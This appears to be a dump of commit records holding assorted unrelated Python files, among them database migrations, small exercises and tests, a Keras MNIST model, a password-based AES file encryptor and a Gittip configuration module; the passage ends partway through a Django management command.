Create Date: 2017-08-14 18:08:50.196042
"""
# revision identifiers, used by Alembic.
revision = '7171349d4c73'
down_revision = 'cc1e65623dc7'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_index('ti_job_id', 'task_instance', ['job_id'], unique=False)
def downgrade():
op.drop_index('ti_job_id', table_name='task_instance')
| Python | 0 | |
74dee1d09fdc09f93af3d15286336d7face4ba08 | add test file for proper_parens. | test_proper_parens.py | test_proper_parens.py | from __future__ import unicode_literals
from proper_parens import check_statement
def test_check_statement():
# Edge cases of strings of length one
value = ")"
assert check_statement(value) == -1
value = "("
assert check_statement(value) == 1
# Edge cases of strings of length two
value = "()"
assert check_statement(value) == 0
# 'Balanced' but broken
value = ")("
assert check_statement(value) == -1
# Broken beginnning, middle, and end
value = ")()"
assert check_statement(value) == -1
value = "())()"
assert check_statement(value) == -1
value = "())"
assert check_statement(value) == -1
# Open beginnning, middle, and end
value = "(()"
assert check_statement(value) == 1
value = "()(()"
assert check_statement(value) == 1
value = "()("
assert check_statement(value) == 1
| Python | 0 | |
77637c0eca6ba5cd00e8f1fbe863a1fd293c980f | Create __init__.py | tests/CAN/__init__.py | tests/CAN/__init__.py | Python | 0.000429 | ||
b936fe0b01a29f8638f662a4a779226fe93cd6fa | Create 5kyu_faulty_odometer.py | Solutions/5kyu/5kyu_faulty_odometer.py | Solutions/5kyu/5kyu_faulty_odometer.py | BASE = '012356789'
def faulty_odometer(num):
result = 0
for i, n in enumerate(str(num)[::-1]):
result += BASE.index(n) * len(BASE) ** i
return result
| Python | 0.000344 | |
ab753bc09d27cc00780d48769d8c12a9015fae18 | Create 0062_siteoption_copyright_notice.py | radio/migrations/0062_siteoption_copyright_notice.py | radio/migrations/0062_siteoption_copyright_notice.py | # -*- coding: utf-8 -*-
# Save default html text for index and about page
from __future__ import unicode_literals
from django.db import migrations, models
def set_default_html(apps, schema_editor):
SiteOption = apps.get_model('radio', 'SiteOption')
SiteOption(name='COPYRIGHT_NOTICE',
value = 'Copyright 2019',
javascript_visible = True,
template_visible = True,
description = 'Edit to update Copyright notice',
).save()
def nothing_to_do(apps, schema_editor):
SiteOption = apps.get_model('radio', 'SiteOption')
SiteOption.objects.get(name='COPYRIGHT_NOTICE').delete()
class Migration(migrations.Migration):
dependencies = [
('radio', '0061_transmission_has_audio'),
]
operations = [
migrations.RunPython(set_default_html, nothing_to_do),
]
| Python | 0 | |
fa7b12066fd81ed97bb0ecbd13690f850021915f | Create crossover.py | cea/optimization/master/crossover.py | cea/optimization/master/crossover.py | """
Crossover routines
"""
from __future__ import division
from deap import tools
from cea.optimization.master.validation import validation_main
def crossover_main(individual, indpb,
column_names,
heating_unit_names_share,
cooling_unit_names_share,
column_names_buildings_heating,
column_names_buildings_cooling,
district_heating_network,
district_cooling_network
):
# create dict of individual with his/her name
individual_with_name_dict = dict(zip(column_names, individual))
if district_heating_network:
# MUTATE BUILDINGS CONNECTED
buildings_heating = [individual_with_name_dict[column] for column in column_names_buildings_heating]
# apply mutations
buildings_heating_mutated = tools.cxUniform(buildings_heating, indpb)[0]
# take back to the individual
for column, cross_over_value in zip(column_names_buildings_heating, buildings_heating_mutated):
individual_with_name_dict[column] = cross_over_value
# MUTATE SUPPLY SYSTEM UNITS SHARE
heating_units_share = [individual_with_name_dict[column] for column in heating_unit_names_share]
# apply mutations
heating_units_share_mutated = tools.cxUniform(heating_units_share, indpb)[0]
# takeback to teh individual
for column, cross_over_value in zip(heating_unit_names_share, heating_units_share_mutated):
individual_with_name_dict[column] = cross_over_value
if district_cooling_network:
# MUTATE BUILDINGS CONNECTED
buildings_cooling = [individual_with_name_dict[column] for column in column_names_buildings_cooling]
# apply mutations
buildings_cooling_mutated = tools.cxUniform(buildings_cooling, indpb)[0]
# take back to teh individual
for column, cross_over_value in zip(column_names_buildings_cooling, buildings_cooling_mutated):
individual_with_name_dict[column] = cross_over_value
# MUTATE SUPPLY SYSTEM UNITS SHARE
cooling_units_share = [individual_with_name_dict[column] for column in cooling_unit_names_share]
# apply mutations
cooling_units_share_mutated = tools.cxUniform(cooling_units_share, indpb)[0]
# takeback to teh individual
for column, cross_over_value in zip(cooling_unit_names_share, cooling_units_share_mutated):
individual_with_name_dict[column] = cross_over_value
# now validate individual
individual_with_name_dict = validation_main(individual_with_name_dict,
column_names_buildings_heating,
column_names_buildings_cooling,
district_heating_network,
district_cooling_network
)
# now pass all the values mutated to the original individual
for i, column in enumerate(column_names):
individual[i] = individual_with_name_dict[column]
return individual, # add the, because deap needs this
| Python | 0.000001 | |
c2509a25eaf3522a55d061f940931447bbf023f1 | test pyCharm | lp3thw/ex41.py | lp3thw/ex41.py | import random
from urllib.request import urlopen
import sys
WORD_URL = "http://learncodethehardway.org/words.txt"
WORDS = []
PHRASES = {
"class %%%(%%%):":
"Make a class named %%% that is-a %%%.",
"class %%%(object):\n\tdef __init__(self, ***)":
"class %%% has-a __init__ that takes self and *** params.",
"class %%%(object):\n\tdef ***(self, @@@)":
"class %%% has-a function *** that takes self and @@@ params.",
"*** = %%%()":
"Set *** to an instance of class %%%.",
"***.***(@@@)":
"From *** get the *** function, call it with params self, @@@.",
"***.*** = '***'":
"From *** get the *** attribute and set it to '***'."
}
# do they want to drill phrases first
if len(sys.argv) == 2 and sys.argv[1] == "english":
PHRASES_FIRST = True
else:
PHRASES_FIRST = False
# load up the words from the website
for word in urlopen(WORD_URL).readlines():
WORDS.append(str(word.strip(), encoding="utf-8"))
def convert(snippet, phrase):
class_names = [w.capitalize() for w in
random.sample(WORDS, snippet.count("%%%"))]
other_names = random.sample(WORDS, snippet.count("***"))
results = []
param_names = []
for i in range(0, snippet.count("@@@")):
param_count = random.randint(1, 3)
param_names.append(', '.join(
random.sample(WORDS, param_count)))
for sentence in snippet, phrase:
result = sentence[:]
# fake class names
for word in class_names:
result = result.replace("%%%", word, 1)
# fake other names
for word in other_names:
result = result.replace("***", word, 1)
# fake parameter lists
for word in param_names:
result = result.replace("@@@", word, 1)
results.append(result)
return results
# keep going until they hit CTRL-D
try:
while True:
snippets = list(PHRASES.keys())
random.shuffle(snippets)
for snippet in snippets:
phrase = PHRASES[snippet]
question, answer = convert(snippet, phrase)
if PHRASES_FIRST:
question, answer = answer, question
print(question)
input("> ")
print(f"ANSWER: {answer}\n\n")
except EOFError:
print("\nBye")
| Python | 0.000002 | |
c50f1bd892f5bc17bb77cd9d09ae5d0d1db8d75c | vowel count Day 5 | submissions/j-nordell/Day5/vowelcount.py | submissions/j-nordell/Day5/vowelcount.py | vowel_dict = {'a': 0, 'e': 0, 'i': 0, 'o': 0, 'u': 0}
vowels = ['a', 'e', 'i', 'o', 'u']
user_text = input("Please enter some text: ")
user_text = list(user_text)
for letter in user_text:
if letter in vowels:
vowel_dict[letter] += 1
print("Here are the results: ")
for key, value in vowel_dict.items():
print(key, value)
| Python | 0.99922 | |
24cfe61a9e1d8ed5a78b2338e652085fc5b3f4e1 | Add example delete | examples/delete.py | examples/delete.py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
from examples import common
from examples import session
def run_delete(opts):
sess = session.make_session(opts)
cls = common.find_resource_cls(opts)
data = common.get_data_option(opts)
obj = cls.new(**data)
obj.delete(sess)
print('Deleted: %s' % str(data))
return
if __name__ == "__main__":
opts = common.setup()
sys.exit(common.main(opts, run_delete))
| Python | 0.99966 | |
0cb6b839509d3f5ecf0e2196c53decbf6fdac65e | add renameDate.py | renameDates.py | renameDates.py | #! Python3
# renameDate.py - rename file name that include date in US format (MM-DD-YYYY)
# to EU format (DD-MM-YYYY)
import shutil, os, re
#Regex for US dates
datePattern = re.compile(r"""^(.*?) # All text before date
((0|1)?\d)- # one or two month digits
((0|1|2|3)?\d)- # one or two day digits
((19|20)\d\d) # four year digits
(.*?)$ # all text after date
""", re.VERBOSE)
# Loop for files in working catalog
for amerFilename in os.listdir('.'):
mo = datePattern.search(amerFilename)
# Leave files with names than not include dates
if mo == None:
continue
# Taking different parts of filename
beforePart = mo.group(1)
monthPart = mo.group(2)
dayPart = mo.group(4)
yearPart = mo.group(6)
afterPart = mo.group(8)
# Forming names in EU format
euroFilename = beforePart + dayPart + '-' + monthPart + '-' + yearPart + afterPart
# Taking fool absolute paths to files
absWorkingDir = os.path.abspath('.')
amerFilename = os.path.join(absWorkingDir, amerFilename)
euroFilename = os.path.join(absWorkingDir, euroFilename)
# Renaming files
print('Changing name "%s" to "%s"...' % (amerFilename, euroFilename))
shutil.move(amerFilename, euroFilename) | Python | 0.000008 | |
b920103c5aef9fa38d91e2fe0eafaeb8fd18d27b | Create FileEncryptor.py | FileEncryptor.py | FileEncryptor.py | import os
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto import Random
def encrypt(key, filename):
chunksize = 64 * 1024
outputFile = "(encrypted)" + filename
filesize = str(os.path.getsize(filename)).zfill(16)
IV = Random.new().read(16)
encryptor = AES.new(key, AES.MODE_CBC, IV)
with open(filename, 'rb') as infile:
with open(outputFile, 'wb') as outfile:
outfile.write(filesize.encode('utf-8'))
outfile.write(IV)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' ' * (16 - (len(chunk) % 16))
outfile.write(encryptor.encrypt(chunk))
def decrypt(key, filename):
chunksize = 64 * 1024
outputFile = filename[11:]
with open(filename, 'rb') as infile:
filesize = int(infile.read(16))
IV = infile.read(16)
decryptor = AES.new(key, AES.MODE_CBC, IV)
with open(outputFile, 'wb') as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
outfile.write(decryptor.decrypt(chunk))
outfile.truncate(filesize)
def getKey(password):
hasher = SHA256.new(password.encode('utf-8'))
return hasher.digest()
def Main():
choice = input("Would you like to (E)ncrypt or (D)ecrypt?: ")
if choice == 'E':
filename = input('File to encrypt: ')
password = input("Password: ")
encrypt(getKey(password), filename)
print("Done.")
elif choice == 'D':
filename = input("File to decrypt: ")
password = input("Password: ")
decrypt(getKey(password), filename)
print("Done")
else:
print("You didn't type E or D, closing....")
if __name__ == '__main__':
Main()
Status API Training Shop Blog About
| Python | 0.000001 | |
06e0f140c517e467445a59be989ba3b9ddd76503 | add tests for stdlib xpath | python/ql/test/library-tests/frameworks/stdlib/XPathExecution.py | python/ql/test/library-tests/frameworks/stdlib/XPathExecution.py | match = "dc:title"
ns = {'dc': 'http://purl.org/dc/elements/1.1/'}
import xml.etree.ElementTree as ET
tree = ET.parse('country_data.xml')
root = tree.getroot()
root.find(match, namespaces=ns) # $ MISSING: getXPath=match
root.findall(match, namespaces=ns) # $ MISSING: getXPath=match
root.findtext(match, default=None, namespaces=ns) # $ MISSING: getXPath=match
from xml.etree.ElementTree import ElementTree
tree = ElementTree()
tree.parse("index.xhtml")
tree.find(match, namespaces=ns) # $ MISSING: getXPath=match
tree.findall(match, namespaces=ns) # $ MISSING: getXPath=match
tree.findtext(match, default=None, namespaces=ns) # $ MISSING: getXPath=match
| Python | 0.000002 | |
70f7096d353ee3edccf6e52e21c6a74db158d906 | Configure settings for py.test | conftest.py | conftest.py | import os
from django.conf import settings
def pytest_configure():
if not settings.configured:
os.environ['DJANGO_SETTINGS_MODULE'] = 'multimedia.tests.settings'
| Python | 0.000001 | |
4863696bbfb46a836b4febc3397e51dd20214414 | add repoquery-recursive.py for downloading rpm packages and their dependencies exceluding which comes from install media | repoquery-recursive.py | repoquery-recursive.py | #!/usr/bin/python3
import sys
import subprocess
repoquery = ['repoquery', '--plugins', '--resolve', '--qf',
'%{name}.%{arch} %{repoid} %{location}', '--plugins', '-R']
package_info = dict()
def check_dep(packages):
#print(packages)
if len(packages) == 0:
return
cmd = repoquery + packages
output = subprocess.check_output(cmd).decode("utf-8")
wait_for_checking = []
for line in output.split('\n'):
if len(line) == 0:
continue
(package_name, repoid, location) = line.split(' ')
if (repoid != 'InstallMedia' and
package_name not in package_info):
package_info[package_name] = (repoid, location)
wait_for_checking.append(package_name)
check_dep(wait_for_checking)
check_dep(sys.argv[1:])
for package in package_info:
print(package_info[package][1])
| Python | 0 | |
eefe2a1f4dc7482f75a2cd3cfd94c1048ba688c6 | Add back $0.25 tip amount; #180 | gittip/__init__.py | gittip/__init__.py | import datetime
import locale
import os
from decimal import Decimal
try: # XXX This can't be right.
locale.setlocale(locale.LC_ALL, "en_US.utf8")
except locale.Error:
locale.setlocale(locale.LC_ALL, "en_US.UTF-8")
BIRTHDAY = datetime.date(2012, 6, 1)
CARDINALS = ['zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine']
MONTHS = [None, 'January', 'February', 'March', 'April', 'May', 'June', 'July',
'August', 'September', 'October', 'November', 'December']
def age():
today = datetime.date.today()
nmonths = today.month - BIRTHDAY.month
plural = 's' if nmonths != 1 else ''
if nmonths < 10:
nmonths = CARDINALS[nmonths]
else:
nmonths = str(nmonths)
return "%s month%s" % (nmonths, plural)
db = None # This global is wired in wireup. It's an instance of
# gittip.postgres.PostgresManager.
# Not sure we won't want this for something yet. Prune if you don't find it in
# the codebase in a month.
OLD_OLD_AMOUNTS= [Decimal(a) for a in ('0.00', '0.08', '0.16', '0.32', '0.64', '1.28')]
OLD_AMOUNTS= [Decimal(a) for a in ('0.25',)]
AMOUNTS = [Decimal(a) for a in ('0.00', '0.25', '1.00', '3.00', '6.00', '12.00', '24.00')]
RESTRICTED_IDS = None
# canonizer
# =========
# This is an Aspen hook to ensure that requests are served on a certain root
# URL, even if multiple domains point to the application.
class X: pass
canonical_scheme = None
canonical_host = None
def canonize(request):
"""Enforce a certain scheme and hostname. Store these on request as well.
"""
scheme = request.headers.get('X-Forwarded-Proto', 'http') # per Heroku
host = request.headers['Host']
bad_scheme = scheme != canonical_scheme
bad_host = bool(canonical_host) and (host != canonical_host)
# '' and False => ''
if bad_scheme or bad_host:
url = '%s://%s' % (canonical_scheme, canonical_host)
if request.line.method in ('GET', 'HEAD', 'OPTIONS', 'TRACE'):
# Redirect to a particular path for idempotent methods.
url += request.line.uri.path.raw
if request.line.uri.querystring:
url += '?' + request.line.uri.querystring.raw
else:
# For non-idempotent methods, redirect to homepage.
url += '/'
request.redirect(url, permanent=True)
def configure_payments(request):
# Work-around for https://github.com/balanced/balanced-python/issues/5
import balanced
balanced.configure(os.environ['BALANCED_API_SECRET'])
| import datetime
import locale
import os
from decimal import Decimal
try: # XXX This can't be right.
locale.setlocale(locale.LC_ALL, "en_US.utf8")
except locale.Error:
locale.setlocale(locale.LC_ALL, "en_US.UTF-8")
BIRTHDAY = datetime.date(2012, 6, 1)
CARDINALS = ['zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine']
MONTHS = [None, 'January', 'February', 'March', 'April', 'May', 'June', 'July',
'August', 'September', 'October', 'November', 'December']
def age():
today = datetime.date.today()
nmonths = today.month - BIRTHDAY.month
plural = 's' if nmonths != 1 else ''
if nmonths < 10:
nmonths = CARDINALS[nmonths]
else:
nmonths = str(nmonths)
return "%s month%s" % (nmonths, plural)
db = None # This global is wired in wireup. It's an instance of
# gittip.postgres.PostgresManager.
# Not sure we won't want this for something yet. Prune if you don't find it in
# the codebase in a month.
OLD_OLD_AMOUNTS= [Decimal(a) for a in ('0.00', '0.08', '0.16', '0.32', '0.64', '1.28')]
OLD_AMOUNTS= [Decimal(a) for a in ('0.25',)]
AMOUNTS = [Decimal(a) for a in ('0.00', '1.00', '3.00', '6.00', '12.00', '24.00')]
RESTRICTED_IDS = None
# canonizer
# =========
# This is an Aspen hook to ensure that requests are served on a certain root
# URL, even if multiple domains point to the application.
class X: pass
canonical_scheme = None
canonical_host = None
def canonize(request):
"""Enforce a certain scheme and hostname. Store these on request as well.
"""
scheme = request.headers.get('X-Forwarded-Proto', 'http') # per Heroku
host = request.headers['Host']
bad_scheme = scheme != canonical_scheme
bad_host = bool(canonical_host) and (host != canonical_host)
# '' and False => ''
if bad_scheme or bad_host:
url = '%s://%s' % (canonical_scheme, canonical_host)
if request.line.method in ('GET', 'HEAD', 'OPTIONS', 'TRACE'):
# Redirect to a particular path for idempotent methods.
url += request.line.uri.path.raw
if request.line.uri.querystring:
url += '?' + request.line.uri.querystring.raw
else:
# For non-idempotent methods, redirect to homepage.
url += '/'
request.redirect(url, permanent=True)
def configure_payments(request):
# Work-around for https://github.com/balanced/balanced-python/issues/5
import balanced
balanced.configure(os.environ['BALANCED_API_SECRET'])
| Python | 0.000008 |
0e2504171dc5679b5cdd1cb219ad1cd1e9f29262 | add a test case for performance benchmarking. | tests/perf_unicorn.py | tests/perf_unicorn.py |
import sys
import os
import time
import angr
import simuvex.s_options as so
import nose.tools
test_location = str(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../'))
def perf_unicorn_0():
p = angr.Project(os.path.join(test_location, 'binaries', 'tests', 'x86_64', 'perf_unicorn_0'))
s_unicorn = p.factory.entry_state(add_options=so.unicorn | {so.STRICT_PAGE_ACCESS}, remove_options={so.LAZY_SOLVES}) # unicorn
pg_unicorn = p.factory.path_group(s_unicorn)
start = time.time()
pg_unicorn.run()
elapsed = time.time() - start
print "Elapsed %f sec" % elapsed
print pg_unicorn.one_deadended
def perf_unicorn_1():
p = angr.Project(os.path.join(test_location, 'binaries', 'tests', 'x86_64', 'perf_unicorn_1'))
s_unicorn = p.factory.entry_state(add_options=so.unicorn | {so.STRICT_PAGE_ACCESS}, remove_options={so.LAZY_SOLVES}) # unicorn
pg_unicorn = p.factory.path_group(s_unicorn)
start = time.time()
pg_unicorn.run()
elapsed = time.time() - start
print "Elapsed %f sec" % elapsed
print pg_unicorn.one_deadended
if __name__ == "__main__":
if len(sys.argv) > 1:
for arg in sys.argv[1:]:
print 'perf_' + arg
globals()['perf_' + arg]()
else:
for fk, fv in globals().items():
if fk.startswith('perf_') and callable(fv):
print fk
res = fv()
| Python | 0.000003 | |
a2059d9c93553843094345ca857508e8cd7325c4 | Create mnist-keras.py | mnist-keras.py | mnist-keras.py | # Author: Hussein Al-barazanchi
# reading and saving the data are based on the code
# from the following link
# http://www.kaggle.com/users/9028/danb/digit-recognizer/convolutional-nn-in-python
# import numpy and pandas for array manipulationa and csv files
import numpy as np
import pandas as pd
# import keras necessary classes
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.optimizers import SGD
from keras.utils import np_utils
# Creating the model which consists of 3 conv layers followed by
# 2 fully conntected layers
print('creating the model')
# Sequential wrapper model
model = Sequential()
# first convolutional layer
model.add(Convolution2D(32,1,2,2))
model.add(Activation('relu'))
# second convolutional layer
model.add(Convolution2D(48, 32, 2, 2))
model.add(Activation('relu'))
model.add(MaxPooling2D(poolsize=(2,2)))
# third convolutional layer
model.add(Convolution2D(32, 48, 2, 2))
model.add(Activation('relu'))
model.add(MaxPooling2D(poolsize=(2,2)))
# convert convolutional filters to flatt so they can be feed to
# fully connected layers
model.add(Flatten())
# first fully connected layer
model.add(Dense(32*6*6, 128, init='lecun_uniform'))
model.add(Activation('relu'))
model.add(Dropout(0.25))
# second fully connected layer
model.add(Dense(128, 128, init='lecun_uniform'))
model.add(Activation('relu'))
model.add(Dropout(0.25))
# last fully connected layer which output classes
model.add(Dense(128, 10, init='lecun_uniform'))
model.add(Activation('softmax'))
# setting sgd optimizer parameters
sgd = SGD(lr=0.05, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy', optimizer=sgd)
print('read data')
# reading training data
training = pd.read_csv('/home/mnist/train.csv')
# split training labels and pre-process them
training_targets = training.ix[:,0].values.astype('int32')
training_targets = np_utils.to_categorical(training_targets)
# split training inputs
training_inputs = (training.ix[:,1:].values).astype('float32')
# read testing data
testing_inputs = (pd.read_csv('/home/mnist/test.csv').values).astype('float32')
# pre-process training and testing data
max_value = np.max(training_inputs)
training_inputs /= max_value
testing_inputs /= max_value
mean_value = np.std(training_inputs)
training_inputs -= mean_value
testing_inputs -= mean_value
# reshaping training and testing data so it can be feed to convolutional layers
training_inputs = training_inputs.reshape(training_inputs.shape[0], 1, 28, 28)
testing_inputs = testing_inputs.reshape(testing_inputs.shape[0], 1, 28, 28)
print("Starting training")
model.fit(training_inputs, training_targets, nb_epoch=10, batch_size=1000, validation_split=0.1, show_accuracy=True)
print("Generating predections")
preds = model.predict_classes(testing_inputs, verbose=0)
def write_preds(preds, fname):
pd.DataFrame({"ImageId": list(range(1,len(preds)+1)), "Label": preds}).to_csv(fname, index=False, header=True)
print('Saving predictions')
write_preds(preds, "keras-mlp.csv")
| Python | 0.000001 | |
e3b7b9e5f8ca1be061c71c764fd62d6aeed3fd43 | Add test suite for bqlmath. | tests/test_bqlmath.py | tests/test_bqlmath.py | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2016, MIT Probabilistic Computing Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import apsw
import pytest
from bayeslite import bayesdb_open
from bayeslite import bqlmath
from bayeslite.math_util import abserr
from bayeslite.util import cursor_value
def get_python_math_call(name, probe):
func = bqlmath.bqlmath_funcs[name]
if isinstance(probe, tuple):
return func(*probe)
else:
return func(probe)
def get_sql_math_call(name, probe):
if isinstance(probe, tuple):
return 'SELECT %s%s' % (name, str(probe))
else:
return 'SELECT %s(%s)' % (name, probe)
PROBES_FLOAT = [-2.5, -1, -0.1, 0, 0.1, 1, 2.5]
PROBES_TUPLE = itertools.combinations(PROBES_FLOAT, 2)
PROBES = itertools.chain(PROBES_FLOAT, PROBES_TUPLE)
FUNCS = bqlmath.bqlmath_funcs.iterkeys()
@pytest.mark.parametrize('name,probe', itertools.product(FUNCS, PROBES))
def test_math_func_one_param(name, probe):
# Retrieve result from python.
python_value_error = None
python_type_error = None
try:
result_python = get_python_math_call(name, probe)
except ValueError:
python_value_error = True
except TypeError:
python_type_error = True
# Retrieve result from SQL.
sql_value_error = None
sql_type_error = None
try:
with bayesdb_open(':memory') as bdb:
cursor = bdb.execute(get_sql_math_call(name, probe))
result_sql = cursor_value(cursor)
except ValueError:
sql_value_error = True
except (TypeError, apsw.SQLError):
sql_type_error = True
# Domain error on both.
if python_value_error or sql_value_error:
assert python_value_error and sql_value_error
# Arity error on both.
elif python_type_error or sql_type_error:
assert python_type_error and sql_type_error
# Both invocations succeeded, confirm results match.
else:
assert abserr(result_python, result_sql) < 1e-4
| Python | 0 | |
2014f326eb73f7b30fe9cad8f30df80e7b8b3f26 | add first test | tests/test_ipcheck.py | tests/test_ipcheck.py | class TestBoundaryValue:
def test_WeakNomral(self):
pass
| Python | 0.000003 | |
d95a7d6017dd6a08d9c8df5af9c61ee2cb23d217 | add test code for wrapper.py | tests/test_wrapper.py | tests/test_wrapper.py | import sys
sys.path.append('..')
import unittest
from wrapper import xp
from chainer import cuda
from chainer import Variable
class WrapperTestCase(unittest.TestCase):
def test_xp(self):
try:
cuda.check_cuda_available()
module = 'cupy'
except:
module = 'numpy'
self.assertEqual(xp.__name__, module)
def test_Zeros(self):
zeros = xp.Zeros((1, 1), dtype=xp.float32)
self.assertEqual(type(zeros), Variable)
self.assertEqual(zeros.data[0][0], 0.0)
self.assertEqual(zeros.data.dtype, xp.float32)
def test_Array(self):
arr = xp.Array([0], dtype=xp.int32)
self.assertEqual(type(arr), Variable)
self.assertEqual(arr.data[0], 0)
self.assertEqual(arr.data.dtype, xp.int32)
| Python | 0.000002 | |
c9a1f5416e62a0d5311a9e692c08ad0fe49b9b18 | Add visualize_vgg16.py | dream/visualize_vgg16.py | dream/visualize_vgg16.py | from keras.applications.vgg16 import VGG16
from keras.layers import Input
from keras import backend as K
import numpy as np
import matplotlib.pyplot as plt
img_width, img_height, num_channels = 224, 224, 3
input_tensor = Input(shape=(img_height, img_width, num_channels))
model = VGG16(include_top=True, weights='imagenet', input_tensor=input_tensor)
layer_dict = dict([(layer.name, layer) for layer in model.layers])
model.summary()
def deprocess_image(x):
# テンソルを平均0、標準偏差0.1になるように正規化
x -= x.mean()
x /= (x.std() + 1e-5)
x *= 0.1
# [0, 1]にクリッピング
x += 0.5
x = np.clip(x, 0, 1)
# RGBに変換
x *= 255
x = np.clip(x, 0, 255).astype('uint8')
return x
def visualize_filter(layer_name, filter_index):
if layer_name not in layer_dict:
print("ERROR: invalid layer name: %s" % layer_name)
return
# 指定した層
layer = layer_dict[layer_name]
# layer.output_shape[-1]はどの層でもフィルタ数にあたる(tfの場合)
# predictions層の場合はクラス数になる
if not (0 <= filter_index < layer.output_shape[-1]):
print("ERROR: invalid filter index: %d" % filter_index)
return
# 指定した層の指定したフィルタの出力の平均を損失とする
# 実際は、層の出力を最大化したいため損失は負の記号をつける
if layer_name == 'predictions':
loss = - K.mean(layer.output[:, filter_index])
else:
loss = - K.mean(layer.output[:, :, :, filter_index])
# 層の出力の入力画像に対する勾配を求める
# 入力画像を微小量変化させたときの出力の変化量を意味する
grads = K.gradients(loss, input_tensor)[0]
# 正規化トリック
# 画像に勾配を足し込んだときにちょうどよい値になる
grads /= (K.sqrt(K.mean(K.square(grads))) + K.epsilon())
# 画像を入力して損失と勾配を返す関数を定義
iterate = K.function([input_tensor], [loss, grads])
# ノイズを含んだ画像(4Dテンソル)から開始する
x = np.random.random((1, img_height, img_width, 3))
x = (x - 0.5) * 20 + 128
# 初期画像を描画
img = deprocess_image(x[0])
plt.imshow(img)
plt.show()
if __name__ == '__main__':
visualize_filter('block1_conv1', 0)
visualize_filter('block5_conv3', 501)
visualize_filter('predictions', 64)
| Python | 0.000012 | |
6733cc00015458c307272a3124857bf686b06fbb | Create h.py | h.py | h.py | print "Hello, World!"
| Python | 0.000002 | |
553009b8f0cb0396f266d10dc5b6010ad60e7a25 | Solve task #21 | 21.py | 21.py | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def mergeTwoLists(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
def step(l, y):
x = ListNode(l.val)
y.next = x
y = y.next
l = l.next
return [l, y]
if not l1 or not l2:
return l1 or l2
x = y = ListNode(0)
while (l1 is not None) and (l2 is not None):
if l1.val < l2.val:
l1, y = step(l1, y)
else:
l2, y = step(l2, y)
if l1 is None:
y.next = l2
else:
y.next = l1
return x.next
| Python | 0.999999 | |
7b949393c0cf20b9f21ff3e743a6ad35b3cccb49 | Create 22.py | 22.py | 22.py | import copy
import math
# [ 0 | 1 | 2 | 3 | 4 | 5 ]
#spell = [spell id | mana | damage | armor | mana | timer]
spells = [(0, 53, 4, 0, 0, 0), (1, 73, 2, 2, 0, 0), (2, 113, 0, 0, 0, 6), (3, 173, 3, 0, 0, 6), (4, 229, 0, 0, 101, 5)]
#2 = Shield
#timer = [spell id, turns left]
bossDamage = 9
Inf = 100000
best = Inf
def minManaToWin(me, boss, mana, manaUsed, timers, myMove):
#print(me, boss, mana, manaUsed, timers, myMove)
global spells, bossDamage, Inf, best
if me > 0 and boss <= 0:
#win
print(manaUsed)
best = min(best, manaUsed)
return 0
if me <= 0:
return Inf
if manaUsed > best:
return Inf
if myMove:
me -= 1
if me <= 0:
return Inf
#apply timers
shieldOn = False
new_timers = []
for timer in timers:
if timer[0] == 2:
shieldOn = True
spell = spells[timer[0]]
mana += spell[4]
me += spell[3]
boss -= spell[2]
if timer[1] > 1:
new_timers += [[timer[0], timer[1] - 1]]
if me > 0 and boss <= 0:
#win
print(manaUsed)
best = min(best, manaUsed)
return 0
res = Inf
if myMove:
for spell in spells:
if spell[1] <= mana:
if spell[5] == 0:
#immediately
tmp = minManaToWin(me + spell[3], boss - spell[2], mana - spell[1], manaUsed + spell[1], new_timers, False)
res = min(res, tmp + spell[1])
else:
inUse = False
for t in new_timers:
if t[0] == spell[0]:
#already appled spell
inUse = True
break
if inUse:
continue
#add timer
tmp = minManaToWin(me, boss, mana - spell[1], manaUsed + spell[1], new_timers + [[spell[0], spell[5]]], False)
res = min(res, tmp + spell[1])
else:
#boss' move
myArmor = 7 if shieldOn else 0
me -= bossDamage - myArmor
tmp = minManaToWin(me, boss, mana, manaUsed, new_timers, True)
res = min(res, tmp)
return res
result = minManaToWin(50, 51, 500, 0, [], True)
print ('res =', result)
| Python | 0.000004 | |
62237000f3ae92638214d96f323a81d6a492d9cd | Update existing FAs with current tier programs (#4829) | financialaid/management/commands/migrate_finaid_program_tiers.py | financialaid/management/commands/migrate_finaid_program_tiers.py | """
Update FinancialAid objects with current tier program
"""
from django.core.management import BaseCommand, CommandError
from financialaid.models import FinancialAid, TierProgram
class Command(BaseCommand):
"""
Updates the existing financial aid objects to current tier programs
"""
help = "Updates the existing financial aid objects to current tier programs"
def handle(self, *args, **kwargs): # pylint: disable=unused-argument
fin_aids = FinancialAid.objects.filter(
tier_program__current=False,
)
updated_count = 0
for financial_aid in fin_aids:
try:
threshold = financial_aid.tier_program.income_threshold
tier_program = TierProgram.objects.get(
income_threshold=threshold,
current=True,
)
except TierProgram.DoesNotExist:
raise CommandError(
'Could not find a current tier program with threshold "{}" for financial aid {}'.format(
threshold,
financial_aid.id
)
)
